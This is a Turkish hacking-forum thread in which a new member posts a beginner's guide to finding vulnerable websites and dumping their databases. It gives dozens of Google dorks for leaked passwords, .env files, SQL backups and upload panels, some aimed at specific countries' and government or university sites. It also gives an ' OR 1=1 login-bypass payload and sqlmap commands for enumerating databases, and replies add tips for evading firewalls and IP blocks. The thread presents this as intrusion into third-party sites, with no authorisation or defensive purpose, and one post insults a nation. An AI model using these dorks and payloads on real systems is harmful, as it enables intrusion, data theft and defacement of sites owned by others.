Adım adım web sitesine sızma ve veritabanı nasıl leak edilir ??

[AltayHR]

Merhaba Değerli THT ailesi

Öncelikle konuya geçmeden önce @Saldırgan hocama teşekkürlerimi sunuyorum

---

Konumuz neler ekleyecek bize acaba ?

Öncelikle konuya geçmeden önce 19 Mayıs gençlik ve Spor Bayramınız kutlu olsun

Evet ben @AltayHR Anka Red Teame son zamanlarda katıldım fakat bu süreçte biraz zorlandım diyebilirim burda başlangıç seviyesinde diyebileceğim birkaç şeyden bahsedeceğim

NE ÖĞRENDİM ?
NE ÖĞRENECEĞİZ ?

Dork araması nedir ?
Dork araması bir web sitesi
Hedefimizde yok ise belirli açıklara sahip hedef bulmak için kullanılan bir yöntemdir peki nasıl bulunur nedir bu doruk anlatayım

Şimdi öncelikle dork bir terminal aracı değil bir kod değildir tıpkı bir arama türü gibidir örneğin aşağıda admin login sayfası görüntülemek için paylaştığım login var buyrun inceleyin sadece basit bir örnek bu doruk u kopyalayıp arama
Motorunuz neyse aratırsanız admin panel çıkar direkt bahsettiğim doruk araması altta bulunan inrul:/admin/login.asp dir PHP de kullanılabilir

inurl:/admin/login.asp

Aynı zamanda bu değiştirilebilir
Mesela burda PHP tabanlı bir sunucu genelde daha basit olur ben yaptığımda veri tabanı saniyeler içinde döküldühadi devam edelim

inurl:/admin/login.php

Ek olarak verebileceğim doruk aramaları hepsini tek tek kendi tarayıcımdan denedim ve sonuç güzel bir veritabanı oldu

1. Yapılandırma dosyası arayan dork

Dork: inurl:/admin/config.php

Açıklama: Yapılandırma dosyalarını içeren dizinleri arar.

2. SQL Veritabanı Yedekleri

Dork: intitle:"index of" "db.sql"

Açıklama: SQL veritabanı yedeği bulunduran açık dizinleri listeler.

3. Ortam Değişkenleri (.env)

Dork: filetype:env "DB_PASSWORD"

Açıklama: Hatalı yapılandırılmış .env dosyalarını ve şifreleri arar.

4. PHP Giriş Sayfaları

Dork: inurl:/login.php

Açıklama: PHP tabanlı giriş sayfalarını bulmak için kullanılır.

5. Şifre Barındıran Metin Dosyaları

Dork: intitle:"index of" "password.txt"

Açıklama: İçerisinde şifre barındıran metin dosyalarını arar.

6. Veritabanı Şifre Sızıntıları

Dork: inurl:config.php intextB_PASSWORD

Açıklama: Veritabanı şifrelerinin açıkça görünebileceği dosyaları arar.

7. WordPress Yapılandırma Dosyaları

Dork: inurl:/wp-config.php

Açıklama: WordPress yapılandırma dosyalarını hedefler.

8. SQL Hataları (Enjeksiyon Riski)

Dork: intext:"sql syntax near"

Açıklama: SQL hatası veren sayfaları bulur.

9. Şifre İçeren Log Dosyaları

Dork: filetype:log "password"

Açıklama: Şifre barındıran log dosyalarını arar.

10. Açık FTP Dizinleri

Dork: inurl:ftp "intext:index of"

Açıklama: Halka açık FTP dizinlerini listeler.

11. Dosya Yükleme Panelleri

Dork: inurl:admin/upload.php

Açıklama: Dosya yükleme yetkisine sahip admin panellerini arar.

12. Gizli PDF Belgeleri

Dork: filetypedf "confidential"

Açıklama: PDF formatındaki gizli/kurumsal belgeleri bulur.

13. Arama Parametreli Sayfalar (XSS Riski)

Dork: inurl:search.php?q=

Açıklama: Arama parametresi içeren sayfaları listeler.

14. Canlı Güvenlik Kameraları

Dork: intitle:"camera viewer" "live"

Açıklama: İnternete açık güvenlik kameralarını bulmaya yarar.

15. Yedekleme Dosyaları (.zip)

Dork: inurl:backup.zip

Açıklama: Web sitesi yedeği olan .zip dosyalarını arar.

Dork araması sadece bunlarla kalmaz belirli bir ülkeye ait site de bulur hadi inceleyelim dork aramalarını

Yunanistan (.gr)

Dork: site:.gr inurl:/admin/login.php

Açıklama: Yunanistan uzantılı sitelerdeki admin panellerini arar.

Dork: site:.gr filetype:sql "dump"

Açıklama: Yunanistan sitelerindeki SQL dump dosyalarını arar.

Dork: site:.gr intitle:"index of" "backup"

Açıklama: Yunanistan sitelerindeki açık yedek dizinlerini arar.

Dork: site:.gr inurl:wp-config.php

Açıklama: Yunanistan sitelerindeki WordPress yapılandırma dosyalarını arar.

Dork: site:.gr "config" "password"

Açıklama: Yunanistan sitelerinde şifre barındıran config dosyalarını arar.

Çin (.cn)

Dork: site:.cn inurl:/admin/login.asp

Açıklama: Çin sitelerindeki ASP tabanlı admin panellerini arar.

Dork: site:.cn filetype:env "DB_PASSWORD"

Açıklama: Çin sitelerindeki .env dosyalarındaki veritabanı şifrelerini arar.

Dork: site:.cn intitle:"index of" "config.php"

Açıklama: Çin sitelerindeki config dosyalarını ifşa eden dizinleri arar.

Dork: site:.cn intext:"sql syntax near"

Açıklama: Çin sitelerindeki SQL hatalarını bulur.

Dork: site:.cn inurl:/upload.php

Açıklama: Çin sitelerindeki dosya yükleme panellerini arar.

Ermenistan (.am)

Dork: site:.am inurl:/admin/

Açıklama: Ermenistan uzantılı sitelerdeki admin dizinlerini arar.

Dork: site:.am filetype:log "password"

Açıklama: Ermenistan sitelerindeki şifre içeren log dosyalarını arar.

Dork: site:.am intext:"index of" "users"

Açıklama: Ermenistan sitelerinde kullanıcı verisi içeren açık dizinleri arar.

Dork: site:.am intitle:"login" inurl:admin

Açıklama: Ermenistan sitelerindeki admin giriş sayfalarını arar.

Dork: site:.am filetypedf "confidential"

Açıklama: Ermenistan sitelerindeki gizli PDF belgelerini arar.

Brezilya (.br)

Dork: site:.br inurl:/admin/login.php

Açıklama: Brezilya sitelerindeki PHP admin panellerini arar.

Dork: site:.br filetype:sql "INSERT INTO"

Açıklama: Brezilya sitelerindeki SQL veritabanı içeriğini arar.

Dork: site:.br intitle:"index of" "db"

Açıklama: Brezilya sitelerindeki veritabanı yedek dizinlerini arar.

Dork: site:.br inurl:config.php "db_password"

Açıklama: Brezilya sitelerindeki veritabanı şifrelerini arar.

Dork: site:.br intext:"powered by" "vbulletin"

Açıklama: Brezilya sitelerinde eski sürüm forum yazılımlarını arar.

İsrail (.il) (lanet olası)

Dork: site:.il inurl:/admin/login.asp

Açıklama: İsrail sitelerindeki ASP admin panellerini arar.

Dork: site:.il filetype:env "API_KEY"

Açıklama: İsrail sitelerindeki API anahtarı içeren dosyaları arar.

Dork: site:.il intitle:"index of" "backup.zip"

Açıklama: İsrail sitelerindeki yedek dosyalarını arar.

Dork: site:.il inurl:search.php?id=

Açıklama: İsrail sitelerindeki SQLi riski taşıyan parametreleri arar.

Dork: site:.il "config" "user" "password"

Açıklama: İsrail sitelerinde kullanıcı ve şifre barındıran config dosyalarını arar.

Dork araması sadece bunlar ile kalmaz
ayrıca edu üniversite okul uzantılı siteler ve .gov devlet uzantılı siteler de bulur açık screch eklenirse açıklar ile bulur farklı uzantılar eklenerek bu arama değiştirilebilir örn edu yerine org veya başka uzantılar eklenebilir

.edu ve .gov İçin Google Dork Sorguları Admin Panelleri

Dork: site:.edu OR site:.gov inurl:/admin/login

Açıklama: Eğitim ve devlet sitelerindeki genel admin giriş sayfalarını listeler.

Hata Mesajları (SQLi riski)

Dork: site:.gov intext:"sql syntax near" OR intext:"mysql_fetch_array"

Açıklama: Veritabanı hatası veren sayfaları bulur; bu, genellikle SQL enjeksiyonu için bir giriş kapısıdır.

Hassas Konfigürasyon Dosyaları

Dork: site:.edu filetype:env "DB_PASSWORD"

Açıklama: Eğitim kurumlarının veritabanı şifrelerini içeren yapılandırma dosyalarını arar.

Yedek dosyalar

Dork: site:.gov filetype:sql OR filetype:zip OR filetype:bak

Açıklama: Devlet sitelerinde unutulmuş veya açıkta kalmış veritabanı yedeği veya arşiv dosyalarını arar.

Kullanıcı/Personel Listeleri

Dork: site:.edu filetype:xls OR filetype:xlsx "personel" OR "öğrenci"

Açıklama: Eğitim kurumlarına ait, yanlışlıkla halka açık bırakılmış Excel listelerini bulur.

Log Dosyaları

Dork: site:.gov filetype:log "password" OR "login"

Açıklama: Devlet sitelerinde şifre veya kullanıcı adı içeren sistem günlüklerini arar.

Açık Dizinler (Directory Listing)

Dork: site:.edu intitle:"index of" "secret" OR "private"

Açıklama: Eğitim kurumlarının web sunucularında, dosya listeleme özelliği açık olan dizinlerde gizli klasörleri arar.

Yapılandırma Dosyaları (.config)

Dork: site:.gov inurl:web.config

Açıklama: Devlet sitelerinin IIS sunucularına ait yapılandırma dosyalarını ifşa eder.

PDF Belgeleri (Bilgi Sızıntısı)

Dork: site:.edu filetypedf "confidential" OR "internal use only"

Açıklama: Eğitim kurumlarının iç yazışma veya gizli belgelerini arar.

E-posta İfşaları

Dork: site:.gov intext:"@gov.il" intext:"password"

Açıklama: Metin içerisinde e-posta adresi ve şifre kalıplarını barındıran sayfaları listeler.

Geliştirici Dosyaları

Dork: site:.edu inurl:/.git/

Açıklama: Web sitesinin kaynak kodlarını barındıran .git dizinlerinin açık olup olmadığını kontrol eder.

Dosya Yükleme Panelleri

Dork: site:.gov inurl:/upload.php OR /upload.asp

Açıklama: Dosya yükleme yetkisi olan sayfaları bulur (Shell yükleme riski için).

Veritabanı İfşaları

Dork: site:.edu filetype:mdb OR filetype:db

Açıklama: Eğitim sitelerindeki veritabanı dosyalarını doğrudan aramaya yarar.

Yönetim Paneli Listeleri

Dork: site:.gov inurl:/admin/upload

Açıklama: Dosya yükleme özelliği olan devlet kurumu admin panellerini hedefler.

Eski/Terkedilmiş Sayfalar

Dork: site:.edu "index of" "backup"

Açıklama: Üniversitelerin eski/terkedilmiş web projelerinin bulunduğu açık dizinleri arar.

ŞİMDİ SIRADA ADMİN LOGİN BYPASS STRATEJİMİZ VAR PEKİ ADMİN LOGİN BYPASS NEDİR ? HADİ GELİN ÖĞRENDİĞİM BİLGİLERİ SİZLERE PAYLAŞAYIM.

Admin login bypass aslında çok nadir görünen bir açıktır bir siteyi yukarda göstermiş olduğum dork ile aratırsanız
Bulduğunuz admin login sitelerinde user password mail gibi yerlere bu kodu girmeniz yeterli olacaktır nadiren görünür fakat burda bilgimi paylaşmak istedim işte bahsettiğim kod ve nasıl yapıldığı hakkında ufak bir tablo

___________________________
HELLO admin SYSTEM

User/mail password
' OR 1=1 — ' OR 1=1 —
-----------------------------------

Kodu kopyalayın ve deneyin elbet bulacaksınız

' OR 1=1 —

----------_____-----
Peki bu kod ne anlama geliyor ?
------------------_____----

1. ' tırnak sql sorgusunda syntax kapatması için koyulur

OR yada demek 1=1 her zaman doğru olduğu için true dönderiyor yani şifre sürekli doğruymuş gibi kandırıyor

— burda ki 2 tane tire ise geri kalanını yorum satırına çevirmesi için

Evet şimdi arkadaşlar şuan diyelim ki açık bir site buldunuz login bypass işe yaramadı dediğim gibi çok nadir görünen bir açıktır peki ne yapacağız ? Soru işaretlerine boğulmayın.
hemen anlatayım burda bize SQLmap yardım ediyorSQLmap sitede açık bulup zararlı kod enjekte eden bir sistemdir
SQLmap kendine özgün kodlar ile sitede açık bulur ve kapıları açar işte İndex basma olayı burdan geçer genel olarak

HADİ KOMUTLARI GÖRELİM O HALDE

-u "URL" : Tek bir hedef URL belirler.

ÖRNEĞİN python3 sqlmap -u hedefurl.com

-r dosya.txt : Burp Suite gibi araçlardan alınan ham (raw) HTTP isteğini analiz eder

-g "google dork" : Google sonuçları üzerinden otomatik tarama yapar

Örneğin python3 sqlmap -g (dork) hedefi fakat şuan olmuyor ben denedim Google engelliyor denemenizi önermem yinede eklemek istedim

-m liste.txt : Bir dosyadaki tüm linkleri sırayla tarar

Örneğin uzun saatler sonucu dork ile tarama yaptınız ve site linklerini txt dosyasına koydunuz bu dosyayı SQL Map a yukarda belirtilen gibi python3 sqlmap -m (dosya adı.txt) ile taratıp çoklu sonuç alabileceksiniz

Diyelim ki bir sitenin veritabanını çektiniz o halde şimdi sıra listelemede sizlere listeleme kodunu sunuyorum bunu aynı terminalde yapın aksi takdirde hata alırsınız

--dbs : Mevcut veritabanlarını listeler örneğin python3 sqlmap --dbs

Buda o an kullanılan veri tabanını gösterir yani güncel veritabanı elde etmek için işte kod

--current-db : O an kullanılan veritabanını gösterir

Örnek kullanım python3 sqlmap --current-db

Örnek bir deneme buyrun inceleyin

python3 sqlmap.py -u "http://hedef.com/id=1" --random-agent --tamper=space2comment --level=5 --risk=3 --batch --dbs

Peki SQL Map nasıl kurulur ?

pip install sqlmap

Veya

git clone GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool cd sqlmap python sqlmap.py (komut örnekleri yukardadır detaylı bilgi değil temel bilgi verilmiştir

Foruma anca bu kadar ekleyebildim umarım faydalı olmuştur

açıkçası bunları öğrenmek benim için güzel bir deneyim oldu zamanla bende yapabiliyormuşum dedim kendi kendime sizde geri durmayın

Kullandığım kaynaklar

Chat GPT bilmediğim değil kafamı karıştıran konular için destek aldım


Gemini ai pro bazı kaynakları pro sürümde daha iyi anlayabilmek için kullandım


Wiki den konu ile alakalı ufak çaplı bir araştırma yaptım

Değerli THT kullanıcıları forumda dork arama kısmında :---) gibi karakterlerin birleşmesi sonucu dork aramaları otomatik olarak emojiye çevrilmiştir bildiğimiz üzre :← bu karakteri ve )←bu karakteri birleştirdiği miz zaman emoji çıkıyor emoji bu şekilde olan direk bunu koysun

:)

Fakat bu şekilde olan

;)

bunu koysunumarım bilgi faydalı olmuştur

ÖNEMLİ NOT ↓
SQL MAP KULLANMAYI BİLMEYEN YADA ANLAMAYAN FORUM ARACILIĞIYLA BENİMLE İLETİŞİME GEÇEBİLİR DETAYLI/UYGULAMALI BİR ŞEKİLDE DERS VEREBİLİRİM BİLDİĞİMİ ANLATIRIM ŞİMDİDEN OKUDUĞUNUZ İÇİN SAĞOLUN

Şimdilik bu kadar THT ailesi görüşmek üzre

 

['BackSix]

Konuda bahsi gecen Sqlmap uygulamasini nereden indirilebilir, nasil yuklenebilir ?
Görsellik acısından yazı fontları renkleri ve sayfa duzeni gibi durumlara dikkat edersen konu daha cekici olur hemde okunması daha keyifli hale gelir.
Dork kısımında dorkları ülkelere/kelimelere/hatalara göre de aratabilirsin bunlarada değinebilirsin.

Eline sağlık. Başarılar.

 

[AltayHR]

Konuda bahsi gecen Sqlmap uygulamasini nereden indirilebilir, nasil yuklenebilir ?
Görsellik acısından yazı fontları renkleri ve sayfa duzeni gibi durumlara dikkat edersen konu daha cekici olur hemde okunması daha keyifli hale gelir.
Dork kısımında dorkları ülkelere/kelimelere/hatalara göre de aratabilirsin bunlarada değinebilirsin.

Eline sağlık. Başarılar.

Hemen düzenleyeceğim sağolun

 

[ATK]

Konuyu Okudum Gayet Güzel Ellerinize Sağlık

 

[AltayHR]

Konuyu Okudum Gayet Güzel Ellerinize Sağlık

Teşekkürler

 

[ATK]

Teşekkürler

Forumda Yenisiniz Daha Güzel Konular Açmaya Devam Edin Böylece Forum İçinde Daha çabuk gelişirsiniz. İyi Forumlar

 

[XLTAY]

Gayet Güzel Ellerinize Sağlık

 

[codewriter42]

Merhaba Değerli THT ailesi

---

Konumuz neler ekleyecek bize acaba ?


Evet ben @AltayHR Anka Red Teame son zamanlarda katıldım fakat bu süreçte biraz zorlandım diyebilirim burda başlangıç seviyesinde diyebileceğim birkaç şeyden bahsedeceğim

NE ÖĞRENDİM ?
NE ÖĞRENECEĞİZ ?

Dork araması nedir ?
Dork araması bir web sitesi
Hedefimizde yok ise belirli açıklara sahip hedef bulmak için kullanılan bir yöntemdir peki nasıl bulunur nedir bu doruk anlatayım

Şimdi öncelikle dork bir terminal aracı değil bir kod değildir tıpkı bir arama türü gibidir örneğin aşağıda admin login sayfası görüntülemek için paylaştığım login var buyrun inceleyin sadece basit bir örnek bu doruk u kopyalayıp arama
Motorunuz neyse aratırsanız admin panel çıkar direkt bahsettiğim doruk araması altta bulunan inrul:/admin/login.asp dir PHP de kullanılabilir

Aynı zamanda bu değiştirilebilir
Mesela burda PHP tabanlı bir sunucu genelde daha basit olur ben yaptığımda veri tabanı saniyeler içinde döküldühadi devam edelim


Ek olarak verebileceğim doruk aramaları hepsini tek tek kendi tarayıcımdan denedim ve sonuç güzel bir veritabanı oldu






























































Dork araması sadece bunlarla kalmaz belirli bir ülkeye ait site de bulur hadi inceleyelim dork aramalarını





















































































Dork araması sadece bunlar ile kalmaz
ayrıca edu üniversite okul uzantılı siteler ve .gov devlet uzantılı siteler de bulur açık screch eklenirse açıklar ile bulur farklı uzantılar eklenerek bu arama değiştirilebilir örn edu yerine org veya başka uzantılar eklenebilir

Admin login bypass aslında çok nadir görünen bir açıktır bir siteyi yukarda göstermiş olduğum dork ile aratırsanız
Bulduğunuz admin login sitelerinde user password mail gibi yerlere bu kodu girmeniz yeterli olacaktır nadiren görünür fakat burda bilgimi paylaşmak istedim işte bahsettiğim kod ve nasıl yapıldığı hakkında ufak bir tablo

___________________________
HELLO admin SYSTEM

User/mail password
' OR 1=1 — ' OR 1=1 —
-----------------------------------

Kodu kopyalayın ve deneyin elbet bulacaksınız


----------_____-----
Peki bu kod ne anlama geliyor ?
------------------_____----

Evet şimdi arkadaşlar şuan diyelim ki açık bir site buldunuz login bypass işe yaramadı dediğim gibi çok nadir görünen bir açıktır peki ne yapacağız ? Soru işaretlerine boğulmayın.
hemen anlatayım burda bize SQLmap yardım ediyorSQLmap sitede açık bulup zararlı kod enjekte eden bir sistemdir
SQLmap kendine özgün kodlar ile sitede açık bulur ve kapıları açar işte İndex basma olayı burdan geçer genel olarak

HADİ KOMUTLARI GÖRELİM O HALDE

Örnek bir deneme buyrun inceleyin


Peki SQL Map nasıl kurulur ?

Veya


Foruma anca bu kadar ekleyebildim umarım faydalı olmuştur

açıkçası bunları öğrenmek benim için güzel bir deneyim oldu zamanla bende yapabiliyormuşum dedim kendi kendime sizde geri durmayın

Kullandığım kaynaklar

Chat GPT bilmediğim değil kafamı karıştıran konular için destek aldım


Gemini ai pro bazı kaynakları pro sürümde daha iyi anlayabilmek için kullandım


Wiki den konu ile alakalı ufak çaplı bir araştırma yaptım

Değerli THT kullanıcıları forumda dork arama kısmında :---) gibi karakterlerin birleşmesi sonucu dork aramaları otomatik olarak emojiye çevrilmiştir bildiğimiz üzre :← bu karakteri ve )←bu karakteri birleştirdiği miz zaman emoji çıkıyor emoji bu şekilde olan direk bunu koysun

:)

Fakat bu şekilde olan

;)

bunu koysunumarım bilgi faydalı olmuştur

ÖNEMLİ NOT ↓
SQL MAP KULLANMAYI BİLMEYEN YADA ANLAMAYAN FORUM ARACILIĞIYLA BENİMLE İLETİŞİME GEÇEBİLİR DETAYLI/UYGULAMALI BİR ŞEKİLDE DERS VEREBİLİRİM BİLDİĞİMİ ANLATIRIM ŞİMDİDEN OKUDUĞUNUZ İÇİN SAĞOLUN

Şimdilik bu kadar THT ailesi görüşmek üzre

Elinize sağlık güzel konu olmuş

 

[nussed]

Merhaba Değerli THT ailesi

---

Konumuz neler ekleyecek bize acaba ?


Evet ben @AltayHR Anka Red Teame son zamanlarda katıldım fakat bu süreçte biraz zorlandım diyebilirim burda başlangıç seviyesinde diyebileceğim birkaç şeyden bahsedeceğim

NE ÖĞRENDİM ?
NE ÖĞRENECEĞİZ ?

Dork araması nedir ?
Dork araması bir web sitesi
Hedefimizde yok ise belirli açıklara sahip hedef bulmak için kullanılan bir yöntemdir peki nasıl bulunur nedir bu doruk anlatayım

Şimdi öncelikle dork bir terminal aracı değil bir kod değildir tıpkı bir arama türü gibidir örneğin aşağıda admin login sayfası görüntülemek için paylaştığım login var buyrun inceleyin sadece basit bir örnek bu doruk u kopyalayıp arama
Motorunuz neyse aratırsanız admin panel çıkar direkt bahsettiğim doruk araması altta bulunan inrul:/admin/login.asp dir PHP de kullanılabilir

Aynı zamanda bu değiştirilebilir
Mesela burda PHP tabanlı bir sunucu genelde daha basit olur ben yaptığımda veri tabanı saniyeler içinde döküldühadi devam edelim


Ek olarak verebileceğim doruk aramaları hepsini tek tek kendi tarayıcımdan denedim ve sonuç güzel bir veritabanı oldu






























































Dork araması sadece bunlarla kalmaz belirli bir ülkeye ait site de bulur hadi inceleyelim dork aramalarını





















































































Dork araması sadece bunlar ile kalmaz
ayrıca edu üniversite okul uzantılı siteler ve .gov devlet uzantılı siteler de bulur açık screch eklenirse açıklar ile bulur farklı uzantılar eklenerek bu arama değiştirilebilir örn edu yerine org veya başka uzantılar eklenebilir

Admin login bypass aslında çok nadir görünen bir açıktır bir siteyi yukarda göstermiş olduğum dork ile aratırsanız
Bulduğunuz admin login sitelerinde user password mail gibi yerlere bu kodu girmeniz yeterli olacaktır nadiren görünür fakat burda bilgimi paylaşmak istedim işte bahsettiğim kod ve nasıl yapıldığı hakkında ufak bir tablo

___________________________
HELLO admin SYSTEM

User/mail password
' OR 1=1 — ' OR 1=1 —
-----------------------------------

Kodu kopyalayın ve deneyin elbet bulacaksınız


----------_____-----
Peki bu kod ne anlama geliyor ?
------------------_____----

Evet şimdi arkadaşlar şuan diyelim ki açık bir site buldunuz login bypass işe yaramadı dediğim gibi çok nadir görünen bir açıktır peki ne yapacağız ? Soru işaretlerine boğulmayın.
hemen anlatayım burda bize SQLmap yardım ediyorSQLmap sitede açık bulup zararlı kod enjekte eden bir sistemdir
SQLmap kendine özgün kodlar ile sitede açık bulur ve kapıları açar işte İndex basma olayı burdan geçer genel olarak

HADİ KOMUTLARI GÖRELİM O HALDE

Örnek bir deneme buyrun inceleyin


Peki SQL Map nasıl kurulur ?

Veya


Foruma anca bu kadar ekleyebildim umarım faydalı olmuştur

açıkçası bunları öğrenmek benim için güzel bir deneyim oldu zamanla bende yapabiliyormuşum dedim kendi kendime sizde geri durmayın

Kullandığım kaynaklar

Chat GPT bilmediğim değil kafamı karıştıran konular için destek aldım


Gemini ai pro bazı kaynakları pro sürümde daha iyi anlayabilmek için kullandım


Wiki den konu ile alakalı ufak çaplı bir araştırma yaptım

Değerli THT kullanıcıları forumda dork arama kısmında :---) gibi karakterlerin birleşmesi sonucu dork aramaları otomatik olarak emojiye çevrilmiştir bildiğimiz üzre :← bu karakteri ve )←bu karakteri birleştirdiği miz zaman emoji çıkıyor emoji bu şekilde olan direk bunu koysun

:)

Fakat bu şekilde olan

;)

bunu koysunumarım bilgi faydalı olmuştur

ÖNEMLİ NOT ↓
SQL MAP KULLANMAYI BİLMEYEN YADA ANLAMAYAN FORUM ARACILIĞIYLA BENİMLE İLETİŞİME GEÇEBİLİR DETAYLI/UYGULAMALI BİR ŞEKİLDE DERS VEREBİLİRİM BİLDİĞİMİ ANLATIRIM ŞİMDİDEN OKUDUĞUNUZ İÇİN SAĞOLUN

Şimdilik bu kadar THT ailesi görüşmek üzre

Merhaba Değerli THT ailesi

---

Konumuz neler ekleyecek bize acaba ?


Evet ben @AltayHR Anka Red Teame son zamanlarda katıldım fakat bu süreçte biraz zorlandım diyebilirim burda başlangıç seviyesinde diyebileceğim birkaç şeyden bahsedeceğim

NE ÖĞRENDİM ?
NE ÖĞRENECEĞİZ ?

Dork araması nedir ?
Dork araması bir web sitesi
Hedefimizde yok ise belirli açıklara sahip hedef bulmak için kullanılan bir yöntemdir peki nasıl bulunur nedir bu doruk anlatayım

Şimdi öncelikle dork bir terminal aracı değil bir kod değildir tıpkı bir arama türü gibidir örneğin aşağıda admin login sayfası görüntülemek için paylaştığım login var buyrun inceleyin sadece basit bir örnek bu doruk u kopyalayıp arama
Motorunuz neyse aratırsanız admin panel çıkar direkt bahsettiğim doruk araması altta bulunan inrul:/admin/login.asp dir PHP de kullanılabilir

Aynı zamanda bu değiştirilebilir
Mesela burda PHP tabanlı bir sunucu genelde daha basit olur ben yaptığımda veri tabanı saniyeler içinde döküldühadi devam edelim


Ek olarak verebileceğim doruk aramaları hepsini tek tek kendi tarayıcımdan denedim ve sonuç güzel bir veritabanı oldu






























































Dork araması sadece bunlarla kalmaz belirli bir ülkeye ait site de bulur hadi inceleyelim dork aramalarını





















































































Dork araması sadece bunlar ile kalmaz
ayrıca edu üniversite okul uzantılı siteler ve .gov devlet uzantılı siteler de bulur açık screch eklenirse açıklar ile bulur farklı uzantılar eklenerek bu arama değiştirilebilir örn edu yerine org veya başka uzantılar eklenebilir

Admin login bypass aslında çok nadir görünen bir açıktır bir siteyi yukarda göstermiş olduğum dork ile aratırsanız
Bulduğunuz admin login sitelerinde user password mail gibi yerlere bu kodu girmeniz yeterli olacaktır nadiren görünür fakat burda bilgimi paylaşmak istedim işte bahsettiğim kod ve nasıl yapıldığı hakkında ufak bir tablo

___________________________
HELLO admin SYSTEM

User/mail password
' OR 1=1 — ' OR 1=1 —
-----------------------------------

Kodu kopyalayın ve deneyin elbet bulacaksınız


----------_____-----
Peki bu kod ne anlama geliyor ?
------------------_____----

Evet şimdi arkadaşlar şuan diyelim ki açık bir site buldunuz login bypass işe yaramadı dediğim gibi çok nadir görünen bir açıktır peki ne yapacağız ? Soru işaretlerine boğulmayın.
hemen anlatayım burda bize SQLmap yardım ediyorSQLmap sitede açık bulup zararlı kod enjekte eden bir sistemdir
SQLmap kendine özgün kodlar ile sitede açık bulur ve kapıları açar işte İndex basma olayı burdan geçer genel olarak

HADİ KOMUTLARI GÖRELİM O HALDE

Örnek bir deneme buyrun inceleyin


Peki SQL Map nasıl kurulur ?

Veya


Foruma anca bu kadar ekleyebildim umarım faydalı olmuştur

açıkçası bunları öğrenmek benim için güzel bir deneyim oldu zamanla bende yapabiliyormuşum dedim kendi kendime sizde geri durmayın

Kullandığım kaynaklar

Chat GPT bilmediğim değil kafamı karıştıran konular için destek aldım


Gemini ai pro bazı kaynakları pro sürümde daha iyi anlayabilmek için kullandım


Wiki den konu ile alakalı ufak çaplı bir araştırma yaptım

Değerli THT kullanıcıları forumda dork arama kısmında :---) gibi karakterlerin birleşmesi sonucu dork aramaları otomatik olarak emojiye çevrilmiştir bildiğimiz üzre :← bu karakteri ve )←bu karakteri birleştirdiği miz zaman emoji çıkıyor emoji bu şekilde olan direk bunu koysun

:)

Fakat bu şekilde olan

;)

bunu koysunumarım bilgi faydalı olmuştur

ÖNEMLİ NOT ↓
SQL MAP KULLANMAYI BİLMEYEN YADA ANLAMAYAN FORUM ARACILIĞIYLA BENİMLE İLETİŞİME GEÇEBİLİR DETAYLI/UYGULAMALI BİR ŞEKİLDE DERS VEREBİLİRİM BİLDİĞİMİ ANLATIRIM ŞİMDİDEN OKUDUĞUNUZ İÇİN SAĞOLUN

Şimdilik bu kadar THT ailesi görüşmek üzre

sql map çin her duruma özel fonfigiyasyonları yapay zeka verir ama çoğu zaman bu denemeleri yaparken waf(web application firewall ) sizin ipnizi bloklar çook eski sitelerde bunlar işe yarar

 

[cingoz-recai]

Dork kullanımı hack sırasında çok kullanılır. Güzel ve etkili bir anlatım. Ama bir soru bu dorlar sadece google da oluyor.. yahooda işe yarar mı

 

[xertauqDefacer]

Yeni bir baslangıc olarak güzel konu, dork kısmına gelirsek gösterdiyin dorklar eskiden popüler olan dorklar, duyulan dorklarla bisey yapmak çok zaman yenilgi saylır. Ama hedef bir site seçib o siteye dorkları kullanırsak o zaman bisey yapıla bilinyo.

Örnek
site: örnek.com inurl:
FileUplod2asp?=

 

[AltayHR]

Dork kullanımı hack sırasında çok kullanılır. Güzel ve etkili bir anlatım. Ama bir soru bu dorlar sadece google da oluyor.. yahooda işe yarar mı

Bence işe yarar denemeye değer

Yeni bir baslangıc olarak güzel konu, dork kısmına gelirsek gösterdiyin dorklar eskiden popüler olan dorklar, duyulan dorklarla bisey yapmak çok zaman yenilgi saylır. Ama hedef bir site seçib o siteye dorkları kullanırsak o zaman bisey yapıla bilinyo.

Örnek
site: örnek.com inurl:
FileUplod2asp?=

Bilgi için teşekkür ederim sağolun

sql map çin her duruma özel fonfigiyasyonları yapay zeka verir ama çoğu zaman bu denemeleri yaparken waf(web application firewall ) sizin ipnizi bloklar çook eski sitelerde bunlar işe yarar

İp blok a karşı uçak modu /modem fişi çekmek işe yarayabilir daha güçlü bir komut ile tekrar denenir ve ayrıca random komutlar pek işe yaramaz her waf a davranışa özel komut üretilmesi gerekmektedir bypass için işe yarayabilir teşekkür ederim bilgi için

 

[ALİXSEY]

Sana özelden yazdım abi

 

[AltayHR]

Sana özelden yazdım abi

Tamamdır dost

 

[REALWHİTEHATHACKER12]

Elinize sağlık

bazı yerlerde mesela şurada
Dork: filetypedf "confidential"
Dork: filetype: pdf "confidential"

emoji oluyor adljghadjgladhugadg
bide Ankaredteam resimleri kocccaammman olmuşş

sql map çin her duruma özel fonfigiyasyonları yapay zeka verir ama çoğu zaman bu denemeleri yaparken waf(web application firewall ) sizin ipnizi bloklar çook eski sitelerde bunlar işe yarar

--delay ve --threads ile ip blok derdinden kurtulabilirsiniz.
yavaş ama sorunsuz olur.

 

[AltayHR]

Elinize sağlık

bazı yerlerde mesela şurada
Dork: filetypedf "confidential"
Dork: filetype: pdf "confidential"

emoji oluyor adljghadjgladhugadg
bide Ankaredteam resimleri kocccaammman olmuşş


--delay ve --threads ile ip blok derdinden kurtulabilirsiniz.
yavaş ama sorunsuz olur.

çok güldüm buna